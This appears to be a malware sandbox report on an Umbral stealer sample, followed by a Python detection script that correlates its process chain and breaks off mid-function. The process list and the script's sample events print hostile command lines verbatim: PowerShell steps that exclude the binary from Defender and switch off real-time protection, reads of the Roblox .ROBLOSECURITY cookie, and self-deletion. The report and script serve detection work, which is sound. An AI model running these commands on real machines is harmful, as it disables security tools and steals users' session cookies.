Analysis Overview
SHA256
e82372deee967ba8a1a74e29a8887ac64e700554153267d09a184986a98efa29
Threat Level: Known bad
The file cheeto.exe was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Umbral
Umbral family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Runs ping.exe
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-23 11:11
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-23 11:11
Reported
2024-06-23 11:56
Platform
win11-20240508-en
Max time kernel
2699s
Max time network
2696s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\cheeto.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133636147488275763" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cheeto.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cheeto.exe
"C:\Users\Admin\AppData\Local\Temp\cheeto.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\cheeto.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheeto.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\cheeto.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97200ab58,0x7ff97200ab68,0x7ff97200ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3048 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4164 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4348 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97200ab58,0x7ff97200ab68,0x7ff97200ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3820 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4316 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4644 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4476 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4476 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4736 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4716 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:2
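The process chain listed above is the part of this report a detection engineer can act on: wmic queries for the machine UUID, OS caption, RAM size and GPU name; attrib +h +s on the stealer's own image; Add-MpPreference to exclude that image from Defender, then Set-MpPreference to switch off real-time monitoring, IOAV, script scanning, IPS, controlled folder access, MAPS reporting and sample submission; Get-ItemPropertyValue reads of the Roblox .ROBLOSECURITY value; and finally cmd /c ping && del to remove the binary. The following is an added example, not part of the sandbox report or of the Umbral sample: it runs over process-creation events constructed from the command lines above (the pid/ppid values and the pid/ppid/image/cmdline field names are assumptions, loosely modelled on Sysmon Event ID 1), correlates children by parent, and for Set-MpPreference reports which Defender features were actually turned off rather than only matching the cmdlet name.

```python
"""Correlate the Umbral-style child-process chain from process-creation telemetry (added example)."""
import re
from collections import defaultdict

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"
STEALER = r"C:\Users\Admin\AppData\Local\Temp\cheeto.exe"

# Constructed events: command lines are those from the report's Processes section,
# pid/ppid values are invented for the example. The last event is benign admin noise.
SAMPLE_EVENTS = [
    {"pid": 436, "ppid": 100, "image": STEALER, "cmdline": f'"{STEALER}"'},
    {"pid": 1001, "ppid": 436, "image": WMIC, "cmdline": '"wmic.exe" csproduct get uuid'},
    {"pid": 1002, "ppid": 436, "image": r"C:\Windows\SYSTEM32\attrib.exe",
     "cmdline": f'"attrib.exe" +h +s "{STEALER}"'},
    {"pid": 1003, "ppid": 436, "image": POWERSHELL,
     "cmdline": f"\"powershell.exe\" Add-MpPreference -ExclusionPath '{STEALER}'"},
    {"pid": 1004, "ppid": 436, "image": POWERSHELL,
     "cmdline": '"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
                '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true '
                '-DisableScriptScanning $true -EnableControlledFolderAccess Disabled '
                '-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled '
                '-SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2'},
    {"pid": 1005, "ppid": 436, "image": POWERSHELL,
     "cmdline": '"powershell.exe" Get-ItemPropertyValue -Path '
                'HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY'},
    {"pid": 1006, "ppid": 436, "image": WMIC, "cmdline": '"wmic.exe" os get Caption'},
    {"pid": 1007, "ppid": 436, "image": WMIC, "cmdline": '"wmic.exe" computersystem get totalphysicalmemory'},
    {"pid": 1008, "ppid": 436, "image": WMIC, "cmdline": '"wmic" path win32_VideoController get name'},
    {"pid": 1009, "ppid": 436, "image": r"C:\Windows\SYSTEM32\cmd.exe",
     "cmdline": f'"cmd.exe" /c ping localhost && del /F /A h "{STEALER}" && pause'},
    {"pid": 2001, "ppid": 900, "image": POWERSHELL, "cmdline": '"powershell.exe" Get-MpPreference'},
]

# Set-MpPreference switches that weaken Defender. A None label means "use the captured switch name".
WEAKENING = [
    (re.compile(r"-(Disable\w+)\s+\$true", re.I), None),
    (re.compile(r"-EnableControlledFolderAccess\s+Disabled", re.I), "ControlledFolderAccess"),
    (re.compile(r"-EnableNetworkProtection\s+AuditMode", re.I), "NetworkProtection"),
    (re.compile(r"-MAPSReporting\s+Disabled", re.I), "MAPSReporting"),
    (re.compile(r"-SubmitSamplesConsent\s+(?:NeverSend|2)\b", re.I), "SubmitSamplesConsent"),
]
EXCLUSION = re.compile(r"\bAdd-MpPreference\b.*?-ExclusionPath\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)

# wmic queries the sample runs to fingerprint the host, in lower case for substring matching.
FINGERPRINT_QUERIES = ("csproduct get uuid", "os get caption",
                       "computersystem get totalphysicalmemory", "win32_videocontroller get name")


def defender_tampering(cmdline):
    """Return the distinct Defender features a command line disables or excludes (empty if none)."""
    hits = []
    if re.search(r"\bSet-MpPreference\b", cmdline, re.I):
        for pattern, label in WEAKENING:
            for m in pattern.finditer(cmdline):
                hits.append(label or m.group(1))
    for m in EXCLUSION.finditer(cmdline):
        path = next(g for g in m.groups() if g is not None)
        hits.append("Exclusion:" + path)
    return list(dict.fromkeys(hits))  # dedupe, keep first-seen order


def hunt(events):
    """Group children by parent pid and return {ppid: [(rule, pid, detail), ...]} for parents that fire."""
    image_of = {e["pid"]: e["image"] for e in events}
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e["ppid"]].append(e)

    report = {}
    for ppid, children in by_parent.items():
        parent_image = image_of.get(ppid, "").lower()
        findings, fingerprints = [], set()
        for c in children:
            cl = c["cmdline"]
            low = cl.lower()
            image = c["image"].lower()
            tampering = defender_tampering(cl)
            if tampering:
                findings.append(("defender_tamper", c["pid"], tampering))
            if ".roblosecurity" in low:
                findings.append(("roblox_cookie_theft", c["pid"], cl))
            if image.endswith("wmic.exe"):
                fingerprints.update(q for q in FINGERPRINT_QUERIES if q in low)
            # attrib hiding the parent's own image, and cmd deleting it after a ping delay
            if image.endswith("attrib.exe") and "+h" in low and "+s" in low and parent_image in low:
                findings.append(("hides_own_binary", c["pid"], parent_image))
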